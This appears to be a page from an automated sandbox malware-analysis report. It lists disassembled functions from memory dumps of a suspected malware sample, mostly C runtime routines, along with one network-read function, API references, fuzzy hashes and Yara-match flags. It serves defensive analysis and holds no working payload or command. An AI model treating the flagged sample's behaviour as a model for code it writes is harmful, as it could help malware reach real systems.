Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 194d23d78a7530926df8253abc19602fce8fc6649c780d967afcd7dccf04e9f6
Instruction ID: 9caaa85424732638a533447db036373c94518d46a1d9f65793ecca3e1a8de25d
Opcode Fuzzy Hash: 194d23d78a7530926df8253abc19602fce8fc6649c780d967afcd7dccf04e9f6
Instruction Fuzzy Hash: 19E01274644245B6FB155B60DC45F993B95DB047D0F118030FA0CA80E5DBB1E99599C9

Function 00412822 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 004128A9

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: ea5dc4856b585dd579de17702f7f9642f7d44acf4acc8e31691820c31d006a79
Instruction ID: 6012ccbf35aa319517377e765832e55e269021952583a9b626e33c473f35baf7
Opcode Fuzzy Hash: ea5dc4856b585dd579de17702f7f9642f7d44acf4acc8e31691820c31d006a79
Instruction Fuzzy Hash: A6B13571A002459FDB25CF68CA817EEBBE1EF55340F14816BD845EB341D2BC9992CB68

Function 04B52A89 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 04B52B10

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 00bd01e052c6ca4725e3dc98c9fc8d994eb0987dbdd7d2e2c545ffa9104eb7c9
Instruction ID: 02a552d982c9984a1b1bac77fe61ae331d2408373eee9c2b43d7e4130cbb2361
Opcode Fuzzy Hash: 00bd01e052c6ca4725e3dc98c9fc8d994eb0987dbdd7d2e2c545ffa9104eb7c9
Instruction Fuzzy Hash: 1FB11532A062869FEB19CF28C8807BEFBF5EF45340F1445E9DC549B2A1D634A902CF60

Function 04D01C22 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 04D01CA9

Memory Dump Source

Source File: 00000000.00000003.2523875768.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4cf0000_7JKssbjRDa.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 00bd01e052c6ca4725e3dc98c9fc8d994eb0987dbdd7d2e2c545ffa9104eb7c9
Instruction ID: 69c86d9ac2cbcabf67793ed5a3a3d409a27c6f7a9974910ead7e1ab8c51a9ea7
Opcode Fuzzy Hash: 00bd01e052c6ca4725e3dc98c9fc8d994eb0987dbdd7d2e2c545ffa9104eb7c9
Instruction Fuzzy Hash: 48B12532A002469FEB21CF28C8807EEBBF5FF55344F14C56AD8559B381E636A942CB60

Function 04B41AE7 Relevance: 6.3, APIs: 4, Instructions: 298networkfileCOMMON

Download Yara Rule

APIs

InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 04B41B6C
InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 04B41B8B

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID: FileInternet$PointerRead
String ID:
API String ID: 3197321146-0
Opcode ID: f9ec063c9d2e41b3af08dc7f95bc4ff4171d8ea44204e87ef2b2e3f71c5be050
Instruction ID: 38f03f2f50ce7fb5e1d488fa682dcfb14914d823c11f0e815f3cc0a36ff6d32e
Opcode Fuzzy Hash: f9ec063c9d2e41b3af08dc7f95bc4ff4171d8ea44204e87ef2b2e3f71c5be050
Instruction Fuzzy Hash: 96C16EB0A002189FEB25CF28CD88BEAB7B5FF89704F1045D8E509A7690D775BA85CF50

Function 0040AE84 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0040AF4B
___AdjustPointer.LIBCMT ref: 0040AF6E
___AdjustPointer.LIBCMT ref: 0040B00A

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
Instruction ID: 88ef4a02ba2930d6a04adc46f9a2f5105df9e51eba4518f207ac4bbffbfe15f9
Opcode Fuzzy Hash: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
Instruction Fuzzy Hash: E151D1B1600303AFDB299F15D841BABB3A4EF44314F14413FE801A76D2E739AC65D79A

Function 04B4B0EB Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 04B4B1B2
___AdjustPointer.LIBCMT ref: 04B4B1D5
___AdjustPointer.LIBCMT ref: 04B4B271

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
Instruction ID: f0bc5704de4a8aec523d52425b52e3bee8f4acdc25eac687b52e62684058ebf2
Opcode Fuzzy Hash: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
Instruction Fuzzy Hash: CE51E372A08602AFEF298F10D880B7A7BA4FF84304F1445ADDA4597A90E731F951FB91

Function 04CFA284 Relevance: 6.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 04CFA34B
___AdjustPointer.LIBCMT ref: 04CFA36E
___AdjustPointer.LIBCMT ref: 04CFA40A

Memory Dump Source

Source File: 00000000.00000003.2523875768.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4cf0000_7JKssbjRDa.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
Instruction ID: 96e02adebae30f45631e36f17cd4e2790953f2bb6f2a3d0f583c6d7f4dfadc9d
Opcode Fuzzy Hash: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
Instruction Fuzzy Hash: EF51BF727012029FEBA99F55DC40BBAF7A7EF44314F14412DEA0946290E73BF985D790

Function 10003EDA Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 10003FA1
___AdjustPointer.LIBCMT ref: 10003FC4
___AdjustPointer.LIBCMT ref: 10004060

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
Instruction ID: 9e97f9b43940e94c385e873cf65d718b9a08959cb0185780d8acf6a52a646172
Opcode Fuzzy Hash: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
Instruction Fuzzy Hash: 9D51BFB6A04202AFFB16CF11D941BAB77A8EF047D0F11856DEA05A72A9DB31EC40D794

Function 00415A49 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 0040FC08: _free.LIBCMT ref: 0040FC16

Part of subcall function 004134F7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,0041384C,?,00000000,00000000), ref: 00413599

GetLastError.KERNEL32 ref: 00415AB1
__dosmaperr.LIBCMT ref: 00415AB8
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00415AF7
__dosmaperr.LIBCMT ref: 00415AFE

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: ca7ce2db1058a54df87d71c7a914b0946fa5af84fdd88a5f61fb18a9b6564db0
Instruction ID: 3f7c4113f524ad2c0abd5e3f91609bb3d7c3a41f61a1f3e5b12bbd4c913db815
Opcode Fuzzy Hash: ca7ce2db1058a54df87d71c7a914b0946fa5af84fdd88a5f61fb18a9b6564db0
Instruction Fuzzy Hash: 5221D871604615EFDB20AF66DCC19EBB76CEF443A8710862BF82497291D73CED8187A4

Function 04B55CB0 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 04B4FE6F: _free.LIBCMT ref: 04B4FE7D

Part of subcall function 04B5375E: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,04B588CA,?,?,?,00000000,?,04B58639,0000FDE9,00000000,?), ref: 04B53800

GetLastError.KERNEL32 ref: 04B55D18
__dosmaperr.LIBCMT ref: 04B55D1F
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 04B55D5E
__dosmaperr.LIBCMT ref: 04B55D65

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 2446def1f9b4e50dcca6d59721d257bc06bfc03ce38444d90e74b9eed1d69467
Instruction ID: 08308f1979cd23a2967e901f9ccb00e7a8daaa7dba466098c2f7cb83c5f6d14b
Opcode Fuzzy Hash: 2446def1f9b4e50dcca6d59721d257bc06bfc03ce38444d90e74b9eed1d69467
Instruction Fuzzy Hash: 9821D872600605BFEB30AF65CC84F6BF7ACEF402697004598ED29975A0E731FD009750

Function 10007BCE Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 100081F0: _free.LIBCMT ref: 100081FE

Part of subcall function 10008DC4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,1000B163,?,00000000,00000000), ref: 10008E70

GetLastError.KERNEL32 ref: 10007C36
__dosmaperr.LIBCMT ref: 10007C3D
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10007C7C
__dosmaperr.LIBCMT ref: 10007C83

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: b7af9aa25762b68c67a19e1abcb47a9b758bf4775fc138b5a0a35b694754267d
Instruction ID: 4d86bd2ae757562d8160192595c5732c56f34f1228d97d68919d00ee2a874974
Opcode Fuzzy Hash: b7af9aa25762b68c67a19e1abcb47a9b758bf4775fc138b5a0a35b694754267d
Instruction Fuzzy Hash: 9021AC75A00216AFB720DF658C85D5BB7ADFF042E4B108529FA699724ADB35EC408BA0

Function 04B51DB1 Relevance: 6.1, APIs: 4, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
Instruction ID: ad62378e5a4cb657ef427a22b8bffecd54b32d2b315963f5834abef0fb0ddb65
Opcode Fuzzy Hash: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
Instruction Fuzzy Hash: 7121D871F01221BBDB318B2C9C84B5AB764EF417A0F150DA1ED06A72B0EA30FD01D6E4

Function 004111FD Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00401ED8,?,00401EDC,0040C3A9,?,00401ED8,7622DF80,?,004114AD,00000000,7622DF80,00000000,00000000,00401ED8), ref: 00411202
_free.LIBCMT ref: 0041125F
_free.LIBCMT ref: 00411295
SetLastError.KERNEL32(00000000,00000008,000000FF,?,004114AD,00000000,7622DF80,00000000,00000000,00401ED8), ref: 004112A0

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 8f2be2869976a8119261bfaf498dece40e74cd62e7ae4b35ba2787d73ab106da
Instruction ID: cded345c8d5c530dafeb31fb37215a8dc2974a232bbf80fd36b18c5a372c037c
Opcode Fuzzy Hash: 8f2be2869976a8119261bfaf498dece40e74cd62e7ae4b35ba2787d73ab106da
Instruction Fuzzy Hash: 8011A7327005002A965127B57C86EFB26698BC57B8B64037BFB15E22F1EA3D8C92411D

Function 04B51464 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(04B4213F,?,04B42143,04B4C610,?,04B4213F,0041D0A0,?,04B51714,00000000,0041D0A0,00000000,00000000,04B4213F), ref: 04B51469
_free.LIBCMT ref: 04B514C6
_free.LIBCMT ref: 04B514FC
SetLastError.KERNEL32(00000000,0042A174,000000FF,?,04B51714,00000000,0041D0A0,00000000,00000000,04B4213F), ref: 04B51507

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: d87a196747eb98be69f930891d617142d2a680cdf12a75ecda7b171a806f77d5
Instruction ID: 83c9c325586f02c49b688f083690531fbb78fc7f4d2aeebf1767d39968b0b31e
Opcode Fuzzy Hash: d87a196747eb98be69f930891d617142d2a680cdf12a75ecda7b171a806f77d5
Instruction Fuzzy Hash: BF11C232F012043BE7222BBCAC85F3AA659CBC1278B6456F4FD24961F0EB25AC129915

Function 10006E9C Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00000000,100059DF,?,10001F4F,00000000), ref: 10006EA1
_free.LIBCMT ref: 10006EFE
_free.LIBCMT ref: 10006F34
SetLastError.KERNEL32(00000000,0000000B,000000FF,?,?,00000000,100059DF,?,10001F4F,00000000), ref: 10006F3F

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 72c61705ed6df8d98b2a0eedb55838999870745f68928b586d93f1ef3c7b0de2
Instruction ID: 52538b18816049bcedc1269911990ba1ec418b01f35f7c97631a1a3369067357
Opcode Fuzzy Hash: 72c61705ed6df8d98b2a0eedb55838999870745f68928b586d93f1ef3c7b0de2
Instruction Fuzzy Hash: BE11E33AA006566AF242D674DC81E6F328BEBC92F57310134F528921D9DE74DE094631

Function 00411354 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0040C33E,004124E1,?,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?), ref: 00411359
_free.LIBCMT ref: 004113B6
_free.LIBCMT ref: 004113EC
SetLastError.KERNEL32(00000000,00000008,000000FF,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?,?), ref: 004113F7

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: a225b34e5669a597189d7f1afa456a980380f95de764cdce8a1da94a10b7a370
Instruction ID: 755f6b258ceaa8e65099160f8bc9def63f750f9b951ab46e134be7d7a93c0062
Opcode Fuzzy Hash: a225b34e5669a597189d7f1afa456a980380f95de764cdce8a1da94a10b7a370
Instruction Fuzzy Hash: AD11CA317005042BA611277A6C82EEB16598BC13B8B64033BFF24821F1EA2D8C92411D

Function 04B515BB Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,04B4C5A5,04B52748,?,?,04B4A3C2,?,?,?,04B41353,?,04B4370E,?,?), ref: 04B515C0
_free.LIBCMT ref: 04B5161D
_free.LIBCMT ref: 04B51653
SetLastError.KERNEL32(00000000,0042A174,000000FF,?,04B4A3C2,?,?,?,04B41353,?,04B4370E,?,?,?), ref: 04B5165E

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 7782d265afb65f697e55785a8c86fcbb5444133996192f0522372e2b86f319e8
Instruction ID: 67b24782ee60f7b0215e44da9312ff3ebd04ff82c535b599612bba0dd6aeb964
Opcode Fuzzy Hash: 7782d265afb65f697e55785a8c86fcbb5444133996192f0522372e2b86f319e8
Instruction Fuzzy Hash: 6D11E536F012002BE72267BD7C85F3AA25ADBC5278BA903F5FD24921F0DB75AC119515

Function 10006FF3 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,1000592B,10007A62,?,?,100066F0), ref: 10006FF8
_free.LIBCMT ref: 10007055
_free.LIBCMT ref: 1000708B
SetLastError.KERNEL32(00000000,0000000B,000000FF,?,?,1000592B,10007A62,?,?,100066F0), ref: 10007096

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: cb1c894d2cda448839c8e2a8665fbefda6a0446c15ff34be0ccd710a5c402308
Instruction ID: 7e0a2054198a3f627b51ebbd791d94cb99ce3d76a099f8cfcb9b0e2a4681bd24
Opcode Fuzzy Hash: cb1c894d2cda448839c8e2a8665fbefda6a0446c15ff34be0ccd710a5c402308
Instruction Fuzzy Hash: B8110236E00514AAF352C6748CC5E6F328AFBC92F17210724F52C921EADE79DE048631

Function 04B4C07E Relevance: 6.1, APIs: 4, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,04B4C13F,?,?,0042B000,00000000,?,04B4C26A,00000004,0041EAFC,0041EAF4,0041EAFC,00000000), ref: 04B4C10E

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
Instruction ID: fc2cc1ff71d54b07b6cac171b20c902f5989dabbeed35ce056e4c10f738151fd
Opcode Fuzzy Hash: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
Instruction Fuzzy Hash: B811E731A42221ABDB224F699C45B9D3B74EF46FA0F1241A0FE01B7380D770F90096D8

Function 04CFA1A4 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

___vcrt_FlsGetValue.LIBVCRUNTIME ref: 04CFA1C0
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 04CFA1D9

Memory Dump Source

Source File: 00000000.00000003.2523875768.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4cf0000_7JKssbjRDa.jbxd

Similarity

API ID: Value___vcrt_
String ID:
API String ID: 1426506684-0
Opcode ID: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
Instruction ID: d0d2b0819cf24f656b98bf94b3291f4e2d55ba1f49ccb1cd89c4ba89ab8a555c
Opcode Fuzzy Hash: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
Instruction Fuzzy Hash: 6401243A3092119FB7A42FB4BC849666B9AEB05678730023AEB18950E0FF1F7D126145

Function 0041AE22 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000), ref: 0041AE39
GetLastError.KERNEL32(?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000,00000000,00000000,?,004185FC,00000000), ref: 0041AE45

Part of subcall function 0041AE0B: CloseHandle.KERNEL32(FFFFFFFE,0041AE55,?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000,00000000,00000000), ref: 0041AE1B

___initconout.LIBCMT ref: 0041AE55

Part of subcall function 0041ADCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0041ADFC,0041AABC,00000000,?,004180A8,00000000,00000020,00000000,00000000), ref: 0041ADE0

WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000,00000000), ref: 0041AE6A

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
Instruction ID: ee4a97f4c5e0560d025622a6e285d837d398bf1ce1ecb10de8e4d9e98fca97b7
Opcode Fuzzy Hash: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
Instruction Fuzzy Hash: 26F0F836942214BBCF222F929C049CA3F26EF087A5F054025FA0985130C63689B19B9A

Function 04B5B089 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,04B5AD36,00000000,00000001,00000000,00000000,?,04B5830F,00000000,00000000,00000000), ref: 04B5B0A0
GetLastError.KERNEL32(?,04B5AD36,00000000,00000001,00000000,00000000,?,04B5830F,00000000,00000000,00000000,00000000,00000000,?,04B58863,?), ref: 04B5B0AC

Part of subcall function 04B5B072: CloseHandle.KERNEL32(0042A930,04B5B0BC,?,04B5AD36,00000000,00000001,00000000,00000000,?,04B5830F,00000000,00000000,00000000,00000000,00000000), ref: 04B5B082

___initconout.LIBCMT ref: 04B5B0BC

Part of subcall function 04B5B034: CreateFileW.KERNEL32(004265E8,40000000,00000003,00000000,00000003,00000000,00000000,04B5B063,04B5AD23,00000000,?,04B5830F,00000000,00000000,00000000,00000000), ref: 04B5B047

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,04B5AD36,00000000,00000001,00000000,00000000,?,04B5830F,00000000,00000000,00000000,00000000), ref: 04B5B0D1

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
Instruction ID: 54ca15ac29abb2cc356db3baf26df87052cd03596aeb9704bf31b045e8cf73b7
Opcode Fuzzy Hash: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
Instruction Fuzzy Hash: EFF03036901114BFCF226FA1DC08ADDBF26FF086A4F094460FE1E96130C632A961DB95

Function 1000CD22 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001), ref: 1000CD39
GetLastError.KERNEL32(?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001,?,1000BFFB,10009A1A), ref: 1000CD45

Part of subcall function 1000CD0B: CloseHandle.KERNEL32(FFFFFFFE,1000CD55,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001), ref: 1000CD1B

___initconout.LIBCMT ref: 1000CD55

Part of subcall function 1000CCCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,1000CCFC,1000C7D5,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CCE0

